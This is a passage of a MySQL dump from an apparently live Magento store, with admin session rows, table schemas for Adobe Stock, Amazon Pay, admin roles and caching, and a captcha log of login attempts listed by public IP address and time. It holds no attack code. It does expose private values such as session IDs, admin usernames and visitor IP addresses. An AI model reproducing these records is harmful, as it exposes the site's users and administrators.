(26, 'fqdnlp812hjd0hradg9fske99f', 2, 1, '2020-08-17 11:41:10', '2020-08-17 11:58:51', '192.168.10.249'),
(27, 'nb9tl9f60ih8kjcmkdvjinrhgn', 2, 1, '2020-08-18 00:04:27', '2020-08-18 00:05:20', '192.168.10.249'),
(28, 'atjeuhtio4lnoei9a5hv3uils6', 2, 1, '2020-08-18 02:54:48', '2020-08-18 03:10:22', '192.168.10.249'),
(29, 'cs5kkio2vcgnuqskk7m9mj6frs', 2, 1, '2020-08-18 03:26:22', '2020-08-18 03:27:37', '192.168.10.249'),
(30, '8oj8f3ict2fdrdj60qfgqd6tf3', 2, 1, '2020-08-18 04:03:47', '2020-08-18 04:14:07', '192.168.10.249'),
(31, 'ca601s3aniadijaquaqd3u2c8r', 2, 2, '2020-08-18 04:33:00', '2020-08-18 05:18:56', '192.168.10.249'),
(32, 'k7s4vfub5ova6sr25227973lcd', 2, 1, '2020-08-18 05:18:56', '2020-08-18 05:19:25', '192.168.10.249'),
(33, 'qf9s3ev14ob5gp60co2knh06lb', 2, 1, '2020-08-18 06:16:58', '2020-08-18 06:28:19', '192.168.10.249'),
(34, '4to6o0772pkf997aap742tvtto', 2, 1, '2020-08-18 07:01:52', '2020-08-18 07:02:28', '192.168.10.249'),
(35, 'irfrkfdn7tijjs01jp8hghcbfq', 2, 1, '2020-08-18 09:36:11', '2020-08-18 09:47:05', '192.168.10.249'),
(36, '6gl4l60ssba86fenk3uuqk5ja6', 2, 1, '2020-08-18 10:02:46', '2020-08-18 10:02:46', '192.168.10.249'),
(37, 'ikv7pqqaecfssrvntghih54o7l', 2, 1, '2020-08-19 02:14:42', '2020-08-19 02:14:42', '192.168.10.249'),
(38, '0b63ou2dg93emq90b2l6ue4e6k', 2, 1, '2020-08-19 04:27:28', '2020-08-19 04:31:16', '192.168.10.249'),
(39, '76siodoa3dl401i6kkdv6mailv', 2, 1, '2020-08-19 07:31:34', '2020-08-19 07:40:19', '192.168.10.249'),
(40, 'acd8qtomdkdvj72n9d3tuf4cmb', 2, 1, '2020-08-20 00:10:49', '2020-08-20 00:23:41', '192.168.10.249'),
(41, 'ja00q956l5q4bvp2gdfq560o3j', 2, 1, '2020-08-20 02:43:20', '2020-08-20 02:43:20', '192.168.10.249'),
(42, 'ru4nu0vv1unjberlqgao5uvc3v', 2, 1, '2020-08-20 03:49:55', '2020-08-20 03:54:48', '192.168.10.249'),
(43, 'vqlr9dpsgp3ma8ec73lac05hl6', 2, 1, '2020-08-20 04:32:18', '2020-08-20 04:32:18', '192.168.10.249'),
(44, 'p8t3gsv2brniacj2556r7m2efc', 2, 1, '2020-08-20 05:43:55', '2020-08-20 05:53:54', '192.168.10.249'),
(45, 'un94r2bvbmb4ni3d0vfvdvpsur', 2, 1, '2020-08-20 09:13:03', '2020-08-20 09:17:12', '192.168.10.249'),
(46, 'atec49sjsr01uhjjahmsv57g74', 2, 1, '2020-08-20 09:36:41', '2020-08-20 09:39:40', '192.168.10.249'),
(47, '90ilff3lf9o0j5fvksjponbq1p', 2, 1, '2020-08-20 10:33:23', '2020-08-20 10:37:15', '192.168.10.249'),
(48, '2uommt3u0f7t4gq1g8m84alose', 2, 1, '2020-08-20 11:07:52', '2020-08-20 11:24:13', '192.168.10.249'),
(49, 'hctseotfpi9603da87qhb03qdv', 2, 1, '2020-08-21 02:33:30', '2020-08-21 02:34:04', '192.168.10.249'),
(50, '223lhb92h2n5h7ocnfisnceb0p', 2, 1, '2020-08-21 03:54:15', '2020-08-21 03:59:23', '192.168.10.249'),
(51, 'p9lh73ck78v5gjl6g9i4kr1t7h', 2, 2, '2020-08-21 04:34:18', '2020-08-21 04:34:32', '192.168.10.249'),
(52, 'l9gcr0v06f8i0c53vthvp31c9u', 2, 1, '2020-08-21 04:34:32', '2020-08-21 04:34:32', '192.168.10.249'),
(53, 'ni8vf853jj3jrbcq9o1oe63htm', 2, 1, '2020-08-21 06:28:10', '2020-08-21 06:29:42', '192.168.10.249'),
(54, '6csab8rfn09a8dfb26blvdsq04', 2, 1, '2020-08-22 04:31:16', '2020-08-22 04:36:20', '192.168.10.249'),
(55, 'di7umkgpiqctenvluf3jm781nd', 2, 2, '2020-08-22 04:57:53', '2020-08-22 05:14:47', '192.168.10.249'),
(56, 'dijam05bf0huhcl3lvpijmec6k', 2, 1, '2020-08-22 05:14:47', '2020-08-22 05:19:02', '192.168.10.249'),
(57, '9a70re970jqucem0bl99bidsio', 2, 1, '2020-08-22 05:48:42', '2020-08-22 05:48:42', '192.168.10.249'),
(58, 'fqjrglo18md1upd3kqqv2ti9hv', 2, 1, '2020-08-22 07:15:01', '2020-08-22 07:20:02', '192.168.10.249'),
(59, 'rma3ke5ame60n897lgkk2hq7im', 2, 1, '2020-08-22 08:16:52', '2020-08-22 08:31:59', '192.168.10.249'),
(60, 'ipn803vhh4n87ug0g11l32ijbt', 2, 1, '2020-08-22 09:28:10', '2020-08-22 10:24:16', '192.168.10.249'),
(61, 'rhf8qdqju32j8svjar3hi2jems', 2, 1, '2020-08-23 02:26:44', '2020-08-23 02:27:19', '192.168.10.249'),
(62, 'hf2s09q3u0d4q8gcgin5vipl6l', 2, 1, '2020-08-23 03:52:31', '2020-08-23 03:55:27', '192.168.10.249'),
(63, 'omch6bjam3spj4mtrg74f5i6if', 2, 1, '2020-08-23 04:28:18', '2020-08-23 04:35:16', '192.168.10.1'),
(64, 'b9pi736gtjjcj8ab35mqibpo7m', 2, 2, '2020-08-23 23:43:36', '2020-08-23 23:44:06', '192.168.10.1'),
(65, 'ijjnt1is211bfp5llh2u80dvdq', 2, 1, '2020-08-23 23:44:06', '2020-08-23 23:56:48', '192.168.10.1'),
(66, 'igbih2h65evsri3ktic5681dh2', 2, 2, '2020-08-24 00:12:32', '2020-08-24 00:13:54', '192.168.10.1'),
(67, 'qlo15s0tncvoo4ogv1s3rvb2a0', 2, 2, '2020-08-24 00:13:54', '2020-08-24 00:19:01', '192.168.10.1'),
(68, '63l3as31vin4g6u5q1queab5ch', 2, 2, '2020-08-24 00:19:01', '2020-08-24 00:31:18', '192.168.10.1'),
(69, '1p9r9o24e6t957v25vecbkaqt0', 2, 1, '2020-08-24 00:31:17', '2020-08-24 00:31:51', '192.168.10.1'),
(70, 'tsgpoblj9rg86qd1gusbucr631', 2, 1, '2020-08-24 00:58:21', '2020-08-24 01:09:43', '192.168.10.1'),
(71, 'q17mo51jt42nnq97gmlh3jvnmd', 2, 2, '2020-08-27 05:41:43', '2020-08-27 05:42:06', '192.168.10.1'),
(72, 'mkg94g6uteukvvrvddkfd2ob1g', 2, 1, '2020-08-27 05:42:06', '2020-08-27 06:13:01', '192.168.10.1'),
(73, 'k2rc0ced138102h86q7m581tkm', 2, 2, '2020-08-28 05:43:01', '2020-08-28 05:52:22', '192.168.10.1'),
(74, '6h60vkkmcooeenlpnubj4apdg5', 2, 1, '2020-08-28 05:52:22', '2020-08-28 05:55:52', '192.168.10.1'),
(75, '20d8g4jqmokgtjulfsfu38e4ao', 2, 1, '2020-08-28 05:55:37', '2020-08-28 06:50:06', '192.168.10.1'),
(76, '9j3vgf1kjcaqgeomibq8gvb8fk', 2, 1, '2020-08-29 02:18:13', '2020-08-29 02:25:04', '192.168.10.1'),
(77, 'nj68fiac4ga7bvocvbo9jvmirf', 2, 1, '2020-08-29 05:55:17', '2020-08-29 05:58:08', '192.168.10.1'),
(78, '411odgljcptd94jf2p8asn2mmo', 2, 1, '2020-08-29 06:08:25', '2020-08-29 06:08:59', '192.168.10.1'),
(79, '5l199flrjv76a03rgakk94sot8', 2, 0, '2021-04-13 04:44:26', '2021-04-13 04:55:39', '103.87.214.212'),
(80, 'm87v50jemb2kmb1302oa424bhh', 2, 1, '2021-04-13 04:56:26', '2021-04-13 06:01:29', '103.87.214.212'),
(81, 'rkofbcu0irb85qm4eg7p33cmhc', 2, 1, '2021-04-13 12:07:04', '2021-04-13 12:17:30', '103.87.214.205'),
(82, 'iittfuae4vrmqd08oicmj21t0n', 2, 1, '2021-04-21 04:32:05', '2021-04-21 04:32:05', '103.87.214.205'),
(83, 'lift8seutv701e9afmac0ecip6', 2, 1, '2021-04-21 06:01:06', '2021-04-21 06:11:24', '103.204.211.132'),
(84, 'vieoi4k1emkq55ru2i5j3svplt', 2, 1, '2021-04-21 09:38:30', '2021-04-21 09:38:30', '103.204.211.132'),
(85, '20v8d62pfbfqlmg51r0g0f8cl7', 2, 1, '2021-04-21 09:39:41', '2021-04-21 09:44:48', '103.204.211.132'),
(86, 'hiauu01h3g1l6i8a3e30qk6tvo', 2, 0, '2021-05-02 11:59:55', '2021-05-02 12:04:04', '37.111.197.218'),
(87, '79fle1m8b3ht899bfi954al76l', 2, 1, '2021-05-02 12:04:30', '2021-05-02 12:05:58', '37.111.197.218'),
(88, '55hvp9593gfl69mvhu11c5h9lr', 2, 1, '2021-05-03 08:31:02', '2021-05-03 08:53:32', '103.204.211.132'),
(89, '466s4ftmb7uj0dj286mei2c1qh', 2, 1, '2021-05-03 09:15:38', '2021-05-03 09:17:38', '103.204.211.132'),
(90, 'hrj986qhr1vplpd15u39n4toc6', 2, 1, '2021-05-07 08:41:09', '2021-05-07 08:41:09', '43.230.120.11'),
(91, 'ml80ko2h0tgdshfi4or382bcmm', 2, 1, '2021-05-07 09:48:38', '2021-05-07 09:53:24', '103.220.207.22'),
(92, 'o5rsl2qks8p5kbc7n5th5nlbl4', 2, 1, '2021-05-07 10:24:13', '2021-05-07 10:56:44', '103.220.207.22'),
(93, 'fqhtatcqhq9dvpkqutar6kl2hv', 2, 1, '2021-05-08 03:44:12', '2021-05-08 03:44:12', '103.220.207.22'),
(94, '7651emaqf235ra82d21a2n8cgl', 2, 1, '2021-05-10 03:16:30', '2021-05-10 03:16:30', '103.220.207.22'),
(95, 't3jc5obsq287mbfj3oa1pjj86i', 2, 1, '2021-05-11 05:12:47', '2021-05-11 05:15:11', '103.220.207.22'),
(96, '6jl1l1tfgu8a0j1lu1npprsfm6', 2, 1, '2021-05-11 08:14:06', '2021-05-11 08:14:06', '103.220.207.22'),
(97, 'u1g2okp4rek0ec1161aev0aua5', 2, 1, '2021-05-12 04:27:04', '2021-05-12 04:27:41', '103.220.207.22'),
(98, 'iemi5qdksihr6p91858301pg64', 2, 1, '2021-05-12 04:53:03', '2021-05-12 04:53:03', '103.220.207.22'),
(99, 'h8ov7mufho6482pu9clqi5oenk', 2, 1, '2021-05-18 02:24:29', '2021-05-18 02:24:29', '103.220.207.22'),
(100, 'cfaos0c41002d75plbbut4vns0', 2, 1, '2021-05-18 02:59:17', '2021-05-18 02:59:17', '103.220.207.22'),
(101, 'fsgbkrkdnbh1qmb96qsok7pru6', 2, 1, '2021-05-18 03:25:11', '2021-05-18 03:28:13', '103.220.207.22'),
(102, 'vikarsd0mm679b4nsqoufl13up', 2, 1, '2021-05-18 04:59:17', '2021-05-18 05:21:13', '103.220.207.22'),
(103, 's72dq7a7647bb868v046t565dc', 2, 1, '2021-05-22 07:41:25', '2021-05-22 07:41:25', '103.87.214.219'),
(104, 'v9r5kbihac7jp4gepa63e0mucb', 2, 1, '2021-05-27 05:24:13', '2021-05-27 05:47:48', '103.87.214.219'),
(105, 'm05kke09i9l13b0f1e54orj20j', 2, 1, '2021-05-27 08:40:56', '2021-05-27 08:40:56', '103.87.214.219'),
(106, 'e0no4coqht62mjdlnkpmrc2q64', 2, 1, '2021-05-27 09:18:21', '2021-05-27 09:18:21', '103.87.214.219'),
(107, 'oqv5kiqp6pvo7i8bpmfidoguqp', 2, 1, '2021-05-27 11:59:28', '2021-05-27 11:59:28', '103.87.214.219'),
(108, 'qeesebp42cvo6oouvsf0r63ggv', 2, 1, '2021-06-07 12:52:40', '2021-06-07 12:53:14', '118.179.43.20'),
(109, 'c0ndofnjjup7atfld3p1q8k3e5', 2, 1, '2021-06-08 03:50:51', '2021-06-08 03:51:19', '103.87.214.219'),
(110, 'p7sgn9rqf5lp90oeu8bnme1jap', 2, 1, '2021-06-08 04:53:36', '2021-06-08 05:23:41', '103.87.214.219'),
(111, 'dcac42vpq61329kuaqleo0op58', 2, 1, '2021-06-08 07:44:17', '2021-06-08 07:44:17', '203.76.99.202'),
(112, 'oavc7000cnp9m7me2kvmp0bdcg', 2, 1, '2021-06-08 07:44:44', '2021-06-08 07:56:46', '203.76.99.202'),
(113, '2sfel0lcqff64mhtc1dhae263k', 2, 1, '2021-06-08 08:13:24', '2021-06-08 09:08:48', '203.76.99.202'),
(114, 'qt2h47pn9sglai64vepodjnf6c', 2, 1, '2021-06-08 12:13:42', '2021-06-08 12:15:34', '203.76.99.202'),
(115, '7m7l92ebvavp5p8v9imnluvp4t', 2, 1, '2021-06-09 04:19:16', '2021-06-09 04:21:23', '203.76.99.202'),
(116, 'ttmh1qkt86qmi0i3f8hdbhjlj3', 2, 1, '2021-06-09 06:33:53', '2021-06-09 06:36:30', '203.76.99.202'),
(117, 'jlnm39h99lbkffcv4pjncfce7q', 2, 1, '2021-06-09 07:03:15', '2021-06-09 07:03:52', '203.76.99.202'),
(118, 'hm6cudru8m2bftnbnbctci2k4a', 2, 1, '2021-06-09 08:15:36', '2021-06-09 08:38:10', '203.76.99.202'),
(119, 'kl301tqenf6at6hf0uc4tjcsq6', 2, 1, '2021-06-09 12:07:33', '2021-06-09 12:07:33', '203.76.99.202'),
(120, 'hmiuus7dd4icugtiepousg9c18', 2, 1, '2021-06-15 12:00:29', '2021-06-15 12:05:08', '203.76.99.202'),
(121, 'sd04a7ss2pun5u3i90nv689aaq', 2, 1, '2021-06-15 16:03:17', '2021-06-15 16:03:17', '203.76.99.202'),
(122, 'vglnqcvr8su0ugvs2j6bibvelv', 2, 1, '2025-11-18 03:56:47', '2025-11-18 04:19:45', '203.76.99.254'),
(123, '180q16hhqeeo9njoqsiecu70uv', 2, 1, '2025-11-18 05:11:07', '2025-11-18 05:23:04', '203.76.99.254');

-- --------------------------------------------------------

--
-- Table structure for table `adobe_stock_asset`
--

CREATE TABLE `adobe_stock_asset` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `media_gallery_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Media gallery ID',
  `category_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Category ID',
  `creator_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Creator ID',
  `is_licensed` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Licensed',
  `creation_date` varchar(255) DEFAULT NULL COMMENT 'Creation Date'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Adobe Stock Asset';

-- --------------------------------------------------------

--
-- Table structure for table `adobe_stock_category`
--

CREATE TABLE `adobe_stock_category` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Adobe Stock Category';

-- --------------------------------------------------------

--
-- Table structure for table `adobe_stock_creator`
--

CREATE TABLE `adobe_stock_creator` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `name` varchar(255) DEFAULT NULL COMMENT 'Asset creator''s name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Adobe Stock Creator';

-- --------------------------------------------------------

--
-- Table structure for table `adobe_user_profile`
--

CREATE TABLE `adobe_user_profile` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `admin_user_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Admin User Id',
  `name` varchar(255) NOT NULL COMMENT 'Display Name',
  `email` varchar(255) NOT NULL COMMENT 'user profile email',
  `image` varchar(255) NOT NULL COMMENT 'user profile avatar',
  `account_type` varchar(255) DEFAULT NULL COMMENT 'Account Type',
  `access_token` text DEFAULT NULL COMMENT 'Access Token',
  `refresh_token` text DEFAULT NULL COMMENT 'Refresh Token',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `access_token_expires_at` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Access Token Expires At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Adobe IMS User Profile';

-- --------------------------------------------------------

--
-- Table structure for table `amazon_customer`
--

CREATE TABLE `amazon_customer` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity_id',
  `customer_id` int(10) UNSIGNED NOT NULL COMMENT 'Customer_id',
  `amazon_id` varchar(255) NOT NULL COMMENT 'Amazon_id'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='amazon_customer';

-- --------------------------------------------------------

--
-- Table structure for table `amazon_pending_authorization`
--

CREATE TABLE `amazon_pending_authorization` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity_id',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order_id',
  `payment_id` int(10) UNSIGNED NOT NULL COMMENT 'Payment_id',
  `authorization_id` varchar(255) DEFAULT NULL COMMENT 'Authorization_id',
  `created_at` datetime NOT NULL COMMENT 'Created_at',
  `updated_at` datetime DEFAULT NULL COMMENT 'Updated_at',
  `processed` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Initial authorization processed',
  `capture` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Initial authorization has capture',
  `capture_id` varchar(255) DEFAULT NULL COMMENT 'Initial authorization capture id'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='amazon_pending_authorization';

-- --------------------------------------------------------

--
-- Table structure for table `amazon_pending_capture`
--

CREATE TABLE `amazon_pending_capture` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity_id',
  `capture_id` varchar(255) NOT NULL COMMENT 'Capture_id',
  `created_at` datetime NOT NULL COMMENT 'Created_at',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'order id',
  `payment_id` int(10) UNSIGNED NOT NULL COMMENT 'payment id'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='amazon_pending_capture';

-- --------------------------------------------------------

--
-- Table structure for table `amazon_pending_refund`
--

CREATE TABLE `amazon_pending_refund` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity_id',
  `refund_id` varchar(255) NOT NULL COMMENT 'Refund_id',
  `created_at` datetime NOT NULL COMMENT 'Created_at',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order_id',
  `payment_id` int(10) UNSIGNED NOT NULL COMMENT 'Payment_id'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='amazon_pending_refund';

-- --------------------------------------------------------

--
-- Table structure for table `amazon_quote`
--

CREATE TABLE `amazon_quote` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `quote_id` int(10) UNSIGNED NOT NULL COMMENT 'Quote ID',
  `amazon_order_reference_id` varchar(255) NOT NULL COMMENT 'Amazon Order Reference ID',
  `sandbox_simulation_reference` varchar(255) DEFAULT NULL COMMENT 'Sandbox simulation reference',
  `confirmed` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Quote confirmed with Amazon'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='amazon_quote';

-- --------------------------------------------------------

--
-- Table structure for table `amazon_sales_order`
--

CREATE TABLE `amazon_sales_order` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order ID',
  `amazon_order_reference_id` varchar(255) NOT NULL COMMENT 'Amazon Order Reference ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='amazon_sales_order';

-- --------------------------------------------------------

--
-- Table structure for table `authorization_role`
--

CREATE TABLE `authorization_role` (
  `role_id` int(10) UNSIGNED NOT NULL COMMENT 'Role ID',
  `parent_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Parent Role ID',
  `tree_level` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Role Tree Level',
  `sort_order` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Role Sort Order',
  `role_type` varchar(1) NOT NULL DEFAULT '0' COMMENT 'Role Type',
  `user_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'User ID',
  `user_type` varchar(16) DEFAULT NULL COMMENT 'User Type',
  `role_name` varchar(50) DEFAULT NULL COMMENT 'Role Name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Admin Role Table';

--
-- Dumping data for table `authorization_role`
--

INSERT INTO `authorization_role` (`role_id`, `parent_id`, `tree_level`, `sort_order`, `role_type`, `user_id`, `user_type`, `role_name`) VALUES
(1, 0, 1, 1, 'G', 0, '2', 'Administrators'),
(2, 1, 2, 0, 'U', 1, '2', 'afridi'),
(3, 1, 2, 0, 'U', 2, '2', 'test');

-- --------------------------------------------------------

--
-- Table structure for table `authorization_rule`
--

CREATE TABLE `authorization_rule` (
  `rule_id` int(10) UNSIGNED NOT NULL COMMENT 'Rule ID',
  `role_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Role ID',
  `resource_id` varchar(255) DEFAULT NULL COMMENT 'Resource ID',
  `privileges` varchar(20) DEFAULT NULL COMMENT 'Privileges',
  `permission` varchar(10) DEFAULT NULL COMMENT 'Permission'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Admin Rule Table';

--
-- Dumping data for table `authorization_rule`
--

INSERT INTO `authorization_rule` (`rule_id`, `role_id`, `resource_id`, `privileges`, `permission`) VALUES
(1, 1, 'Magento_Backend::all', NULL, 'allow');

-- --------------------------------------------------------

--
-- Table structure for table `cache`
--

CREATE TABLE `cache` (
  `id` varchar(200) NOT NULL COMMENT 'Cache Id',
  `data` mediumblob DEFAULT NULL COMMENT 'Cache Data',
  `create_time` int(11) DEFAULT NULL COMMENT 'Cache Creation Time',
  `update_time` int(11) DEFAULT NULL COMMENT 'Time of Cache Updating',
  `expire_time` int(11) DEFAULT NULL COMMENT 'Cache Expiration Time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Caches';

-- --------------------------------------------------------

--
-- Table structure for table `cache_tag`
--

CREATE TABLE `cache_tag` (
  `tag` varchar(100) NOT NULL COMMENT 'Tag',
  `cache_id` varchar(200) NOT NULL COMMENT 'Cache Id'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Tag Caches';

-- --------------------------------------------------------

--
-- Table structure for table `captcha_log`
--

CREATE TABLE `captcha_log` (
  `type` varchar(32) NOT NULL COMMENT 'Type',
  `value` varchar(255) NOT NULL COMMENT 'Value',
  `count` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Count',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Update Time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Count Login Attempts';

--
-- Dumping data for table `captcha_log`
--

INSERT INTO `captcha_log` (`type`, `value`, `count`, `updated_at`) VALUES
('1', '1.0.219.102', 1, '2021-10-30 16:04:40'),
('1', '1.20.194.191', 1, '2021-11-22 19:22:40'),
('1', '1.39.76.47', 1, '2021-11-21 15:26:50'),
('1', '1.52.110.60', 1, '2024-05-02 17:57:05'),
('1', '1.52.203.126', 1, '2021-11-22 06:46:13'),
('1', '1.52.204.71', 2, '2021-11-23 01:36:31'),
('1', '1.53.114.119', 1, '2021-11-23 01:21:19'),
('1', '1.53.114.97', 1, '2021-11-22 11:43:50'),
('1', '1.53.250.70', 1, '2021-11-22 08:22:55'),
('1', '1.55.206.61', 1, '2021-11-22 10:46:35'),
('1', '101.43.104.203', 6, '2022-01-23 09:18:09'),
('1', '101.50.109.88', 1, '2021-11-21 18:06:40'),
('1', '101.53.233.141', 1, '2021-11-21 12:24:12'),
('1', '101.53.241.77', 3, '2021-11-23 02:33:59'),
('1', '101.53.248.38', 1, '2021-11-22 17:20:33'),
('1', '102.157.119.56', 1, '2021-10-28 16:13:05'),
('1', '102.157.9.150', 1, '2021-10-30 12:57:26'),
('1', '102.219.208.101', 2, '2021-11-22 17:38:36'),
('1', '102.222.235.100', 2, '2021-11-04 08:58:55'),
('1', '102.222.235.31', 1, '2021-11-01 16:19:34'),
('1', '102.38.13.50', 2, '2021-11-22 17:32:21'),
('1', '102.47.196.211', 1, '2021-11-22 19:26:50'),
('1', '103.10.66.12', 1, '2021-11-21 08:34:11'),
('1', '103.103.124.194', 2, '2021-11-22 03:09:45'),
('1', '103.109.125.158', 1, '2021-10-27 12:30:50'),
('1', '103.111.102.30', 1, '2021-11-21 12:58:45'),
('1', '103.111.143.22', 2, '2021-11-03 08:02:20'),
('1', '103.112.206.160', 1, '2021-11-22 18:08:14'),
('1', '103.116.251.254', 2, '2021-11-23 01:18:01'),
('1', '103.118.114.183', 1, '2021-11-02 16:54:34'),
('1', '103.118.114.243', 2, '2021-10-28 10:44:43'),
('1', '103.118.76.38', 1, '2021-11-21 08:42:54'),
('1', '103.119.62.0', 1, '2021-11-04 06:08:30'),
('1', '103.120.254.73', 1, '2021-11-04 05:27:05'),
('1', '103.124.137.155', 1, '2021-11-22 17:56:56'),
('1', '103.127.165.50', 1, '2021-11-03 05:21:40'),
('1', '103.127.165.51', 1, '2021-11-02 07:48:53'),
('1', '103.127.165.53', 1, '2021-11-22 04:28:59'),
('1', '103.129.92.161', 1, '2021-10-27 12:07:41'),
('1', '103.132.183.9', 1, '2021-11-22 10:38:47'),
('1', '103.133.202.162', 2, '2021-11-22 11:31:28'),
('1', '103.137.110.214', 4, '2021-11-03 02:09:26'),
('1', '103.14.72.161', 1, '2021-11-21 10:30:25'),
('1', '103.141.159.113', 1, '2021-11-21 12:19:30'),
('1', '103.144.10.84', 1, '2021-11-22 14:50:37'),
('1', '103.144.188.146', 1, '2021-11-21 13:09:41'),
('1', '103.149.60.1', 1, '2021-10-28 13:44:28'),
('1', '103.15.140.90', 4, '2021-11-22 19:18:32'),
('1', '103.150.207.101', 1, '2021-11-21 10:26:42'),
('1', '103.150.227.42', 1, '2021-11-22 21:58:02'),
('1', '103.152.159.50', 1, '2021-11-03 10:38:55'),
('1', '103.154.37.21', 1, '2021-11-22 14:58:16'),
('1', '103.157.221.130', 1, '2021-11-21 10:17:07'),
('1', '103.157.36.162', 1, '2021-11-22 14:45:45'),
('1', '103.161.49.250', 2, '2021-11-22 10:31:38'),
('1', '103.162.224.173', 1, '2021-11-01 07:41:18'),
('1', '103.162.224.81', 1, '2021-10-30 13:14:33'),
('1', '103.162.224.84', 1, '2021-11-04 08:35:23'),
('1', '103.163.110.5', 2, '2021-11-23 02:36:10'),
('1', '103.164.199.149', 1, '2021-11-22 04:19:29'),
('1', '103.165.167.205', 1, '2021-11-02 09:50:40'),
('1', '103.168.2.184', 1, '2021-10-27 12:51:12'),
('1', '103.17.214.52', 1, '2021-11-21 08:15:23'),
('1', '103.174.4.83', 1, '2021-11-21 17:22:58'),
('1', '103.20.135.235', 1, '2021-11-22 18:57:36'),
('1', '103.203.72.94', 1, '2021-11-23 07:32:39'),
('1', '103.206.223.74', 1, '2021-11-21 13:07:19'),
('1', '103.216.68.50', 1, '2021-10-30 10:59:42'),
('1', '103.232.154.44', 1, '2021-11-23 04:19:30'),
('1', '103.237.36.228', 1, '2021-10-27 11:26:06'),
('1', '103.245.195.45', 1, '2022-03-15 03:45:26'),
('1', '103.251.19.134', 1, '2021-10-28 10:58:28'),
('1', '103.252.166.33', 2, '2021-11-22 06:21:14'),
('1', '103.26.85.99', 1, '2021-11-21 10:03:16'),
('1', '103.38.89.222', 1, '2021-10-30 16:29:58'),
('1', '103.39.128.43', 1, '2021-11-21 10:21:39'),
('1', '103.42.124.194', 1, '2021-11-23 05:30:50'),
('1', '103.51.133.126', 1, '2021-11-21 11:38:16'),
('1', '103.53.32.24', 1, '2021-11-01 11:34:02'),
('1', '103.66.234.65', 1, '2021-11-02 09:11:51'),
('1', '103.70.153.12', 1, '2021-11-22 06:17:29'),
('1', '103.71.21.30', 1, '2021-11-22 11:16:15'),
('1', '103.81.194.18', 2, '2021-11-02 06:48:20'),
('1', '103.81.195.166', 2, '2021-11-22 15:37:43'),
('1', '103.81.207.252', 1, '2021-11-22 05:52:17'),
('1', '103.86.146.107', 11, '2022-02-24 23:22:00'),
('1', '104.244.73.14', 1, '2026-03-12 21:18:15'),
('1', '105.106.56.232', 1, '2021-11-22 18:24:49'),
('1', '105.106.57.231', 1, '2021-11-22 06:49:54'),
('1', '105.106.70.144', 2, '2021-11-22 11:28:26'),
('1', '105.110.229.115', 1, '2021-11-22 15:30:39'),
('1', '105.112.143.162', 1, '2021-11-21 12:04:24'),
('1', '105.112.33.81', 1, '2021-11-22 02:21:27'),
('1', '105.158.198.242', 1, '2021-11-21 18:04:46'),
('1', '105.184.84.254', 5, '2024-05-15 19:34:06'),
('1', '105.225.184.186', 1, '2021-11-22 15:07:39'),
('1', '105.235.128.4', 1, '2021-11-21 17:40:32'),
('1', '105.235.129.37', 1, '2021-11-22 19:04:40'),
('1', '105.27.202.234', 1, '2024-11-04 11:57:59'),
('1', '105.66.131.93', 1, '2021-11-03 20:07:51'),
('1', '105.66.2.67', 1, '2021-11-22 10:45:08'),
('1', '105.96.228.43', 1, '2021-11-22 00:32:52'),
('1', '105.97.99.119', 1, '2021-10-27 10:34:14'),
('1', '106.161.65.206', 21, '2026-03-29 05:57:37'),
('1', '106.195.37.57', 1, '2021-11-21 15:30:59'),
('1', '106.197.4.148', 1, '2021-11-21 08:09:33'),
('1', '106.210.42.92', 1, '2021-11-23 05:56:43'),
